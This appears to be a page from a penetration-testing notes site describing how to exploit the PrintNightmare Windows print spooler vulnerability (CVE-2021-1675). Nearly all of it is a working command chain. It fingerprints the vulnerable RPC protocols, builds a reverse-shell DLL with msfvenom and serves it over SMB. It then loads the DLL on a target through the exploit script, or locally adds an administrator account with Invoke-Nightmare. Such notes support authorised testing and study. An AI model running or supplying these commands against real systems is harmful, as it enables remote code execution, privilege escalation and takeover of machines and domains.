CVE-2021-1675 - PrintNightmare

PreviousCVE-2020-16938 NextCVE-2022-21999 - SpoolFool

Last updated 2 years ago

CVE-2021-1675 - PrintNightmare

To check if it's vulnerable,

Using impackets rpcdump.py,

rpcdump.py @192.168.1.10 | egrep 'MS-RPRN|MS-PAR'

Protocol: [MS-PAR]: Print System Asynchronous Remote Protocol 
Protocol: [MS-RPRN]: Print System Remote Protocol

Remote exploitation,

Generate a dll,

msfvenom -p windows/shell/reverse_tcp LHOST=`x` LPORT=443 -f dll > shell.dll

Serve the dll with smbserver

impacket-smbserver -debug morph3 . -smb2support

Exploiting it,

./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 '\\192.168.1.215\smb\addCube.dll'
./CVE-2021-1675.py hackit.local/domain_user:Pass123@192.168.1.10 'C:\addCube.dll'

Local exploitation,

Import-Module .\cve-2021-1675.ps1
Invoke-Nightmare -DriverName "Xerox" -NewUser "john" -NewPassword "SuperSecure"

or

Invoke-Nightmare -DLL "C:\absolute\path\to\your\bindshell.dll"
Invoke-Nightmare # add user `adm1n`/`P@ssw0rd` in the local admin group by default

PreviousCVE-2020-16938 NextCVE-2022-21999 - SpoolFool

Last updated 2 years ago